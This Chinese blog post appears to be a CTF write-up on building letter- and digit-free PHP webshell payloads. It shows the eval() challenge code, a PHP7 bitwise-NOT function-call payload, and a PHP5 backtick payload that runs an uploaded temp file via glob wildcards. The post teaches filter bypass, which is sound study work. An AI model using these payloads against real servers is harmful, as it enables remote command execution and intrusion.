构造无字母数字的webshell实现任意命令执行

最新推荐文章于 2024-09-14 18:46:05 发布
最新推荐文章于 2024-09-14 18:46:05 发布
阅读量944 收藏 24
点赞数 8
文章标签: java 前端 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ningwangh/article/details/141113841
版权

目录

1、题目分析

php7

php5

1、shell下可以利用. 来执行任意脚本

2、Linux文件名支持用glob通配符代替

上传文件测试:

1、题目分析

<?php
if(isset($_GET['code'])){
    $code = $_GET['code'];
    if(strlen($code)>35){
        die("Long.");
    }
    if(preg_match("/[A-Za-z0-9_$]+/",$code)){
        die("NO.");
    }
    eval($code);
}else{
    highlight_file(__FILE__);
}

        通过观察可以看出这道题有两个限制:

1)webshell长度不超过35位

2)除了不包含字母数字,还不能包含$和_

所以我们有关$和_的方式都无法使用

php7

        PHP7前是不允许用`($a)();`这样的方法来执行动态函数的,但PHP7中增加了对此的支持。可以通过('phpinfo')();来执行函数,第一个括号中可以是任意PHP表达式。

        不能使用字母,所以我们使用用url编码来表示:

(%8F%97%8F%96%91%99%90)();

        在linux中~是表示反码,既就是取反。刚好加在前面就可以。所以我们得到:

(~%8F%97%8F%96%91%99%90)();

测试结果展示:

将phpinfo改成任意代码即可

php5

        如果我们尝试用PHP7的payload,将会得到一个错误:

原因就是php5并不支持这种表达方式。

        PHP无法解决问题的情况下,考虑用“反引号”+“shell”的方式来getshell,因为反引号不属于“字母”、“数字”,所以我们可以执行系统命令,但问题来了:如何利用无字母、数字、$的系统命令来getshell?

        可以使用下面的知识来解决:

1、shell下可以利用. 来执行任意脚本

        它的作用和source一样,就是用当前的shell执行一个文件中的命令。比如:当前运行的shell是bash,则. file的意思就是用bash执行file文件中的命令。而且用. file执行文件,是不需要file有x权限的。

如果目标服务器上有一个我们可控的文件,那不就可以利用.来执行它了吗?

        这个文件也很好得到,我们可以发送一个上传文件的POST包,此时PHP会将我们上传的文件保存在临时文件夹下,默认的文件名是/tmp/phpXXXXXX,文件名最后6个字符是随机的大小写字母。

2、Linux文件名支持用glob通配符代替

        执行. /tmp/phpXXXXXX,也是有字母的。此时就可以用到Linux下的glob通配符:

                1)*可以代替0个及以上任意字符

                2)?可以代表1个任意字符

那么,/tmp/phpXXXXXX就可以表示为/*/?????????或/???/?????????。

但如果执行. /???/?????????,页面会显示错误,这是由于执行. /???/?????????通配符后的文件有很多,例如:

        可以看出存在这么多的文件,执行第一个匹配上的文件(即/bin/addr2l ine)的时候就已经出现了错误,导致整个流程停止,根本不会执行到我们上传的文件。

就跟正则表达式类似,glob支持利用[0-9]来表示一个范围。

        我们再来看看之前列出可能干扰我们的文件,发现所有文件名都是小写,只有PHP生成的临时文件包含大写字母。我们只要找到一个可以表示“大写字母”的glob通配符,就能精准找到我们要执行的文件。

翻开ascii码表,可见大写字母位于@与[之间:

我们可以利用[@-[]来表示大写字母:

. /???/????????[@-[]

上传文件测试:

代码:

<!DOCTYPE html>
<html lang="en">
 
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
 
<body>
    <form action="web.php" method="post" enctype="multipart/form-data">
        <input type="file" name="upload_file" id="">
        <input type="submit" value="submit">
    </form>
</body>
 
</html>

文件:

web.php:

<?php
if(isset($_GET['code'])){
    $code = $_GET['code'];
    if(strlen($code)>35){
        die("Long.");
    }
    if(preg_match("/[A-Za-z0-9_$]+/",$code)){
        die("NO.");
    }
    eval($code);
}else{
    highlight_file(__FILE__);
}

可以尝试在上传文件后进行抓包:

?><?=`.+/%3f%3f%3f/%3f%3f%3f%3f%3f%3f%3f%3f%[%40-[]`%3b

将值传入:

结果:

ok,完成!

ningwangh
关注
不用字母数字构造webshell
weixin_46330722的博客
01-21 816
前言 最近做题的时候遇到了许多过滤了字母数字的代码执行,参考了一些大佬的文章后,就想自己写一篇文章来总结一下不用字母数字构造webshell的姿势。 测试代码 <?php $c=$_GET[1]; if(preg_match('/[0-9]|[a-z]/i',$c)){ die("error"); } eval($c); ?> 本文所总结的姿势均用此代码测试。 1 位运算 因为不能用字母数字,所以我们可以通过取反,或,异或等位运算利用特殊字符构造字母数字,再利用php
浅析无字符数字构造webshell
Lemon's blog
08-31 2135
前言: 之前在命令执行的时候多少学了一点,但发现如果不自己去动手实践一下会忘的很快,这次就来动手实践一番。恰好最近做了很多有关无字符数字的CTF题,恰好可以作为例子说一下。 基础知识 0x00:PHP中的异或 在PHP中,两个变量的值进行异或时,会先将两个变量的值转换为ASCII,再将ASCII转换为二进制,对两对二进制数据进行异或,异或完,再将结果转为ASCII,最后将ASCII转为字符串,即为最终结果。 异或规则 0&0=0 1&1=0 0&1=1 1&0=1 两个二
php5构造字母数字webshell实现任意命令执行
qq_68163788的博客
12-02 1385
Webshell是一种恶意软件,通常指的是通过网络渠道上传到受攻击的服务器上的一段可执行代码。它可以被用来获取对服务器的远程控制权限,执行各种操作包括文件管理、数据库访问、系统命令执行等。
字母数字webshell命令执行
weixin_71398630的博客
08-11 472
那么答案就呼之欲出了,我们只要找到一个可以表示“大写字母”的glob通配符,就能精准找到我们要执行的文件。所有方法,都用到了PHP中的变量,需要对变量进行变形、异或、取反等操作,最后动态执行函数。或者叫period,它的作用和source一样,就是用当前的shell执行一个文件中的命令。这个文件也很好得到,我们可以发送一个上传文件的POST包,此时PHP会将我们上传的文件保存在临时文件夹下,默认的文件名是。因为反引号不属于“字母”、“数字”,所以我们可以执行系统命令,但问题来了:如何利用无字母数字
Web安全 _ 无字母数字Webshell 总结.pdf
09-06
字母数字Webshell是指避开常规字母数字字符限制的Webshell构造方法。通常,服务器会通过检测输入是否包含字母数字来防止恶意Webshell的注入。然而,这种防护策略可以通过巧妙的编码转换和利用其他非字母数字...
PHP不包括字母,数字和下划线的webshell
酉酉的博客
10-27 2020
文章目录前言知识铺垫PHP中异或(^)概念PHP取反(~)概念不用数字构造数字用字符串自增,获取字符webshellphp5和7的差异。不用数字字母shell字母数字的字符异或出字母字母数字的字符取反出字母php 递增/递减运算符实例payload不包括数字,字母和下划线的shell实例payload 前言 膜拜下phithon师傅 一些不包含数字字母webshell 另...
Webshell实现与隐藏探究
Coisini的博客
06-09 677
一、什么是webshell webshell简介 webshell,顾名思义:web指的是在web服务器上,而shell是用脚本语言编写的脚本程序,webshell就是就是web的一个管理工具,可以对web服务器进行操作的权限,也叫webadmin。webshell一般是被网站管理员用于网站管理、服务器管理等等一些用途,但是由于webshell的功能比较强大,可以上传下载文件,查看数据库,甚至可...
webshell
prodigal11的博客
02-05 1092
Webshell实现与隐藏探究 一、什么是webshell webshell简介 webshell,顾名思义:web指的是在web服务器上,而shell是用脚本语言编写的脚本程序,webshell就是就是web的一个管理工具,可以对web服务器进行操作的权限,也叫webadmin。webshell一般是被网站管理员用于网站管理、服务器管理等等一些用途,但是由于webshell的功能比较强大,可以上传下载文件,查看数据库,甚至可以调用一些服务器上系统的相关命令(比如创建用户,修改删除文件之类的),通常被黑客利
Java-网络
最新发布
2301_81543552的博客
09-14 440
Java中的网络编程主要涉及使用Socket类进行网络通信,以及理解各种网络协议。以下是一些关键概念和示例代码,帮助您入门。
上传文件到钉盘流程详解
jspyth的博客
09-14 485
本文详解如何通过钉钉的API实现上传文件到钉盘目录,代码通过JAVA实现
Java集合:Stack详解
yang_brother的博客
09-10 599
Java 中的Stack类是一个后进先出(LIFO, Last In First Out)的数据结构,它继承自Vector类。尽管Stack是一个可用的类,但它被认为是遗留的,并且在新代码中不推荐使用。通常建议使用Deque或ArrayDeque作为替代。
Java wrapperr打包springboot项目到linux和Windows
欢迎查阅
09-14 790
测试启动就是点击App.bat 就会有信息的输出 installApp就是注册为一个windows上的一个服务。上图文件复制的地方 全部复制过去 保留自己需要的 然后去掉后缀.in。下载:linux的目前免费的 windows 64位的好像收费的。前提: 一定要有Java环境(我使用的是jdk1.8)解压的目录,然后我们新建自己的项目目录java-jsw。前面是你解压的原文件 后边是你自己建的目录路径。步骤和上面的一样 不过复制的文件不一样。下载一个社区版本的应该就够用了。需要注意的点 有Java环境。
C#基础(11)函数重载
a6s686的博客
09-12 812
我们通过这些例子的学习,想毕你一定已经掌握了函数重载的相关内容,我相信你只要稍加练习,便能达到很熟练的程度。不过不管知识点难或者简单,还是那句话,学习路上,戒骄戒躁,脚踏实地。请期待我的下一篇博客!
Spring-di基本使用
2301_76862031的博客
09-09 1409
spirngDi环境搭建,使用流程,set注入,构造注入,对象注入,外部引入注入,内部创建注入,外部引入级联赋值注入,list集合注入,map集合注入,util注入
计算机毕业设计 基于SpringBoot的课程教学平台的设计与实现 Java+SpringBoot+Vue 前后端分离 文档报告 代码讲解 安装调试
weixin_19164791635
09-12 837
本文介绍了一款基于Java、SpringBoot和Vue.js技术的课程教学平台。该平台服务于管理员、学生和教师,提供教学资源管理、课程信息浏览、作业提交与批改等功能,旨在优化教学流程,提升教育质量,促进教育资源的数字化共享,推动教育信息化发展。
Spring AMQP给消息添加头信息
yong472727322的博客
09-10 278
【代码】Spring AMQP给消息添加头信息。
模拟面试后端开发复盘
Java小白的博客 致力分享每一天学到的知识
09-11 1039
一般来说系统的开发和设计思路的话,就是一般现在的项目基本上都是前后端分离架构来实现的,所以在项目的设计时,要分层次结构来划定。前后端分离架构中,前端一般是有专业的前端工程师来写的,因此我们步需要过分的关注前端,可以在github上找到相关的前端项目即可。
使用API有效率地管理Dynadot域名,查看域名服务器(NS)信息
Dynadot_tech的博客
09-12 1017
Dynadot是通过ICANN认证的域名注册商,自2002年成立以来,服务于全球108个国家和地区的客户,为数以万计的客户提供简洁,优惠,安全的域名注册以及管理服务。Dynadot.com提供的API是专为效率而构建的高级域名管理和获取工具包。使用Dynadot API,可以查看某一域名DNS设置的域名服务器(Name server)信息。
深入理解无字母数字Webshell:绕过与执行策略
这种Webshell的特点在于其构造方式,不包含传统的字母数字字符,而是利用其他非字母数字字符进行编码,以达到执行恶意代码的目的。本资料主要关注如何在限制条件下构建有效的Webshell。 首先,我们要理解无字母...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值